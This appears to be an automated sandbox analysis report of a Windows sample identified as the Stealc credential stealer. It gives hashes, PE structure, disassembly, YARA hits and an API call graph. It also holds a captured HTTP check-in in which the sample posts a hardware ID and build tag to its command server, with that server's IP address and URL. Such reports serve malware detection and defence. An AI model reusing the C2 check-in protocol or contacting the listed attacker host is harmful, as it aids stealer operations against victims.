              http://185.215.113.206/                      | false     |                     | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://185.215.113.206/c4becf79229cb002.phpK | file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://185.215.113.206/c4becf79229cb002.php9 | file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://185.215.113.206/&~ | file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.215.113.206 | file.exe, 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://185.215.113.206/c4becf79229cb002.php# | file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://185.215.113.206/c4becf79229cb002.php2 | file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://185.215.113.206/c4becf79229cb002.phpw | file.exe, 00000003.00000002.1375859223.0000000001379000.00000004.00000020.00020000.00000000.sdmp | false | | high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                               IP              | Domain  | Country  | ASN    | ASN Name               | Malicious
                               185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561922
                              Start date and time:2024-11-24 20:00:13 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 46s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 124
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.945005616294114
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'812'992 bytes
                              MD5:969e7116d6269d76ae0df0b8126872e9
                              SHA1:30b1390b554c8d1e0b0a9af308488276cd13beb9
                              SHA256:d2a488577867cfd25a06cca8c590e7054429f50bfeecb35d641aac911a8ccdb0
                              SHA512:f3a7bff25ab08d2f550d5ba82640377f53ec33695d20aef87fb57331276678e6e3856055cc992e1046f904197db103059788a7ebe21db7f7c806aa9c71f1985f
                              SSDEEP:49152:e2+P+xlmyEAXXoCc/tQJ4IAp/xWoBOsYVqee:n+PSQdp/yiNxW1NVqee
                              TLSH:2D8533381B71DB98E9C026B35759A2FDBF7C81DC70AF76804901E66E8EAFAF12514305
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa98000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F5444E5237Ah
                              js 00007F5444E52391h
                              add byte ptr [eax], al
                              jmp 00007F5444E54375h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add dword ptr [edx], ecx
                              add byte ptr [eax], al
                              pop es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              pushad
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                               Name                                 | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x24b04d        | 0x61         | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x24a000        | 0x2b0        | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x24b1f8        | 0x8          | .idata
                               IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                               IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               (unnamed) | 0x1000 | 0x249000 | 0x1600 | 0b970bc4668bd3b09d7d10b9e6a7ac18 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rsrc | 0x24a000 | 0x2b0 | 0x200 | 14d6a6b72cbfd04e1f75aca3739adfc9 | False | 0.798828125 | data | 6.025684365468982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               (unnamed) | 0x24c000 | 0x2aa000 | 0x200 | 17c4a37063a95caf43a81e1b5f0eeb48 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               cgikgxeh | 0x4f6000 | 0x1a1000 | 0x1a0a00 | e3ff7b204ef2c2a23e971f8d47411ddd | False | 0.9947137291854186 | data | 7.9541098731783055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               aetjlfry | 0x697000 | 0x1000 | 0x600 | 1f93bd451485f53e61cab50f1f2555c6 | False | 0.54296875 | data | 4.716279334483298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .taggant | 0x698000 | 0x3000 | 0x2200 | 84460cc326e9e12310942be19f134d08 | False | 0.06020220588235294 | DOS executable (COM) | 0.6210936678275637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               Name        | RVA      | Size  | Type                                   | Language | Country | ZLIB Complexity
                               RT_MANIFEST | 0x696738 | 0x256 | ASCII text, with CRLF line terminators |          |         | 0.5100334448160535
                               DLL          | Import
                               kernel32.dll | lstrcpy
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-11-24T20:01:19.759532+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49706 | 185.215.113.206 | 80 | TCP
                               Timestamp                           | Source Port | Dest Port | Source IP       | Dest IP
                               Nov 24, 2024 20:01:17.516226053 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                               Nov 24, 2024 20:01:17.639858961 CET | 80          | 49706     | 185.215.113.206 | 192.168.2.7
                               Nov 24, 2024 20:01:17.639945984 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                               Nov 24, 2024 20:01:17.640937090 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                               Nov 24, 2024 20:01:17.771150112 CET | 80          | 49706     | 185.215.113.206 | 192.168.2.7
                               Nov 24, 2024 20:01:19.258642912 CET | 80          | 49706     | 185.215.113.206 | 192.168.2.7
                               Nov 24, 2024 20:01:19.258702040 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                               Nov 24, 2024 20:01:19.261564970 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                               Nov 24, 2024 20:01:19.414659023 CET | 80          | 49706     | 185.215.113.206 | 192.168.2.7
                               Nov 24, 2024 20:01:19.758934021 CET | 80          | 49706     | 185.215.113.206 | 192.168.2.7
                               Nov 24, 2024 20:01:19.759531975 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                               Nov 24, 2024 20:01:24.525204897 CET | 49706       | 80        | 192.168.2.7     | 185.215.113.206
                              • 185.215.113.206
                               Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                               0          | 192.168.2.7 | 49706       | 185.215.113.206 | 80               | 7604 | C:\Users\user\Desktop\file.exe
                               Timestamp | Bytes transferred | Direction | Data

                               Nov 24, 2024 20:01:17.640937090 CET | 90 | OUT
                               GET / HTTP/1.1
                               Host: 185.215.113.206
                               Connection: Keep-Alive
                               Cache-Control: no-cache

                               Nov 24, 2024 20:01:19.258642912 CET | 203 | IN
                               HTTP/1.1 200 OK
                               Date: Sun, 24 Nov 2024 19:01:19 GMT
                               Server: Apache/2.4.41 (Ubuntu)
                               Content-Length: 0
                               Keep-Alive: timeout=5, max=100
                               Connection: Keep-Alive
                               Content-Type: text/html; charset=UTF-8

                               Nov 24, 2024 20:01:19.261564970 CET | 413 | OUT
                               POST /c4becf79229cb002.php HTTP/1.1
                               Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAA
                               Host: 185.215.113.206
                               Content-Length: 211
                               Connection: Keep-Alive
                               Cache-Control: no-cache
                               Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 33 41 32 30 32 42 34 44 38 38 31 35 33 35 34 31 38 33 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a
                               Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"133A202B4D881535418320------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--

                               Nov 24, 2024 20:01:19.758934021 CET | 210 | IN
                               HTTP/1.1 200 OK
                               Date: Sun, 24 Nov 2024 19:01:19 GMT
                               Server: Apache/2.4.41 (Ubuntu)
                               Content-Length: 8
                               Keep-Alive: timeout=5, max=99
                               Connection: Keep-Alive
                               Content-Type: text/html; charset=UTF-8
                               Data Raw: 59 6d 78 76 59 32 73 3d
                               Data Ascii: YmxvY2s=



                              Target ID:3
                              Start time:14:01:12
                              Start date:24/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x6a0000
                              File size:1'812'992 bytes
                              MD5 hash:969E7116D6269D76AE0DF0B8126872E9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000003.1288333304.0000000005050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1375859223.000000000131E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:4.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.3%
                                Total number of Nodes:1406
                                Total number of Limit Nodes:28
execution_graph
lstrcpy 27219->27221 27222 6a5014 lstrlen 27220->27222 27221->27220 27223 6a502a 27222->27223 27224 6a5036 lstrcpy lstrcat 27223->27224 27225 6a504d 27223->27225 27224->27225 27226 6a5079 27225->27226 27227 6a5071 lstrcpy 27225->27227 27228 6a5080 lstrlen 27226->27228 27227->27226 27229 6a509b 27228->27229 27230 6a50ac lstrcpy lstrcat 27229->27230 27231 6a50bc 27229->27231 27230->27231 27232 6a50da lstrcpy lstrcat 27231->27232 27233 6a50ed 27231->27233 27232->27233 27234 6a510b lstrcpy 27233->27234 27235 6a5113 27233->27235 27234->27235 27236 6a5121 InternetConnectA 27235->27236 27236->27180 27237 6a5150 HttpOpenRequestA 27236->27237 27238 6a518b 27237->27238 27239 6a54b1 InternetCloseHandle 27237->27239 27392 6c7310 lstrlen 27238->27392 27239->27180 27243 6a51a4 27400 6c72c0 27243->27400 27246 6c7280 lstrcpy 27247 6a51c0 27246->27247 27248 6c7310 3 API calls 27247->27248 27249 6a51d5 27248->27249 27250 6c7280 lstrcpy 27249->27250 27251 6a51de 27250->27251 27252 6c7310 3 API calls 27251->27252 27253 6a51f4 27252->27253 27254 6c7280 lstrcpy 27253->27254 27255 6a51fd 27254->27255 27256 6c7310 3 API calls 27255->27256 27257 6a5213 27256->27257 27258 6c7280 lstrcpy 27257->27258 27259 6a521c 27258->27259 27260 6c7310 3 API calls 27259->27260 27261 6a5231 27260->27261 27262 6c7280 lstrcpy 27261->27262 27263 6a523a 27262->27263 27264 6c72c0 2 API calls 27263->27264 27265 6a524d 27264->27265 27266 6c7280 lstrcpy 27265->27266 27267 6a5256 27266->27267 27268 6c7310 3 API calls 27267->27268 27269 6a526b 27268->27269 27270 6c7280 lstrcpy 27269->27270 27271 6a5274 27270->27271 27272 6c7310 3 API calls 27271->27272 27273 6a5289 27272->27273 27274 6c7280 lstrcpy 27273->27274 27275 6a5292 27274->27275 27276 6c72c0 2 API calls 27275->27276 27277 6a52a5 27276->27277 27278 6c7280 lstrcpy 27277->27278 27279 6a52ae 27278->27279 27280 6c7310 3 API calls 27279->27280 27281 6a52c3 27280->27281 27282 6c7280 lstrcpy 27281->27282 27283 6a52cc 27282->27283 27284 6c7310 3 API calls 
27283->27284 27285 6a52e2 27284->27285 27286 6c7280 lstrcpy 27285->27286 27287 6a52eb 27286->27287 27288 6c7310 3 API calls 27287->27288 27289 6a5301 27288->27289 27290 6c7280 lstrcpy 27289->27290 27291 6a530a 27290->27291 27292 6c7310 3 API calls 27291->27292 27293 6a531f 27292->27293 27294 6c7280 lstrcpy 27293->27294 27295 6a5328 27294->27295 27296 6c72c0 2 API calls 27295->27296 27297 6a533b 27296->27297 27298 6c7280 lstrcpy 27297->27298 27299 6a5344 27298->27299 27300 6a537c 27299->27300 27301 6a5370 lstrcpy 27299->27301 27302 6c72c0 2 API calls 27300->27302 27301->27300 27303 6a538a 27302->27303 27304 6c72c0 2 API calls 27303->27304 27305 6a5397 27304->27305 27306 6c7280 lstrcpy 27305->27306 27307 6a53a1 27306->27307 27308 6a53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27307->27308 27309 6a549c InternetCloseHandle 27308->27309 27313 6a53f2 27308->27313 27311 6a54ae 27309->27311 27310 6a53fd lstrlen 27310->27313 27311->27239 27312 6a542e lstrcpy lstrcat 27312->27313 27313->27309 27313->27310 27313->27312 27314 6a5473 27313->27314 27315 6a546b lstrcpy 27313->27315 27316 6a547a InternetReadFile 27314->27316 27315->27314 27316->27309 27316->27313 27318 6b8cc6 ExitProcess 27317->27318 27333 6b8ccd 27317->27333 27319 6b8ee2 27319->26208 27320 6b8e88 lstrlen 27320->27333 27321 6b8e6f StrCmpCA 27321->27333 27322 6b8d06 lstrlen 27322->27333 27323 6b8d84 StrCmpCA 27323->27333 27324 6b8da4 StrCmpCA 27324->27333 27325 6b8d5a lstrlen 27325->27333 27326 6b8dbd StrCmpCA 27326->27333 27327 6b8ddd StrCmpCA 27327->27333 27328 6b8dfd StrCmpCA 27328->27333 27329 6b8e1d StrCmpCA 27329->27333 27330 6b8e3d StrCmpCA 27330->27333 27331 6b8d30 lstrlen 27331->27333 27332 6b8e56 StrCmpCA 27332->27333 27333->27319 27333->27320 27333->27321 27333->27322 27333->27323 27333->27324 27333->27325 27333->27326 27333->27327 27333->27328 27333->27329 27333->27330 27333->27331 27333->27332 27334 6b8ebb lstrcpy 27333->27334 27334->27333 27335->26214 27336->26216 27337->26222 27338->26224 
27339->26230 27340->26232 27341->26238 27342->26242 27343->26248 27344->26250 27345->26254 27346->26268 27347->26272 27348->26271 27349->26267 27350->26271 27351->26289 27352->26274 27353->26275 27354->26279 27355->26285 27356->26286 27357->26292 27358->26300 27359->26302 27360->26325 27361->26329 27362->26328 27363->26324 27364->26328 27365->26338 27368 6a161f 27367->27368 27369 6a1633 27368->27369 27370 6a162b lstrcpy 27368->27370 27371 6a164d lstrcpy 27369->27371 27372 6a1655 27369->27372 27370->27369 27371->27372 27373 6a166f lstrcpy 27372->27373 27374 6a1677 27372->27374 27373->27374 27375 6a1699 27374->27375 27376 6a1691 lstrcpy 27374->27376 27375->27060 27376->27375 27378 6c71e6 27377->27378 27379 6c71fc lstrcpy 27378->27379 27380 6c2860 27378->27380 27379->27380 27380->26203 27382 6a4bd0 27381->27382 27382->27382 27383 6a4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27382->27383 27384 6a4c41 27383->27384 27384->27168 27386 6c3e83 27385->27386 27387 6c3e9f lstrcpy 27386->27387 27388 6c3eab 27386->27388 27387->27388 27389 6c3ecd lstrcpy 27388->27389 27390 6c3ed5 GetSystemTime 27388->27390 27389->27390 27391 6c3ef3 27390->27391 27391->27187 27394 6c732d 27392->27394 27393 6a519b 27396 6c7280 27393->27396 27394->27393 27395 6c733d lstrcpy lstrcat 27394->27395 27395->27393 27397 6c728c 27396->27397 27398 6c72b4 27397->27398 27399 6c72ac lstrcpy 27397->27399 27398->27243 27399->27398 27402 6c72dc 27400->27402 27401 6a51b7 27401->27246 27402->27401 27403 6c72ed lstrcpy lstrcat 27402->27403 27403->27401 27409 6b4c77 295 API calls 27431 6c31f0 GetSystemInfo wsprintfA 27455 6b8615 48 API calls 27411 6be049 147 API calls 27416 6c3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27447 6b8615 49 API calls 27456 6c33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27427 6b3959 244 API calls 27432 6b01d9 126 API calls 27417 6c2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27412 6c2853 lstrcpy 27448 6b4b29 303 API calls 27457 
6b23a9 298 API calls 27418 6c30a0 GetSystemPowerStatus 27433 6c29a0 GetCurrentProcess IsWow64Process 27437 6af639 144 API calls 27439 6a16b9 200 API calls 27449 6abf39 177 API calls 27458 6babb2 120 API calls 27429 6c3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27419 6b8c88 16 API calls 27451 6ab309 98 API calls 27420 6c2880 10 API calls 27421 6c4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27422 6c3480 6 API calls 27440 6c3280 7 API calls 27404 8f0e62 27405 8f0fa2 VirtualAlloc 27404->27405 27459 6b8615 47 API calls 27423 6b2499 290 API calls 27460 6adb99 671 API calls 27430 6c4e35 7 API calls 27414 6c2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27452 6c9711 MultiByteToWideChar MultiByteToWideChar MultiByteToWideChar MultiByteToWideChar __setmbcp
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A4C7F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4CD2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4D05
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4D35
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4D73
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006A4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
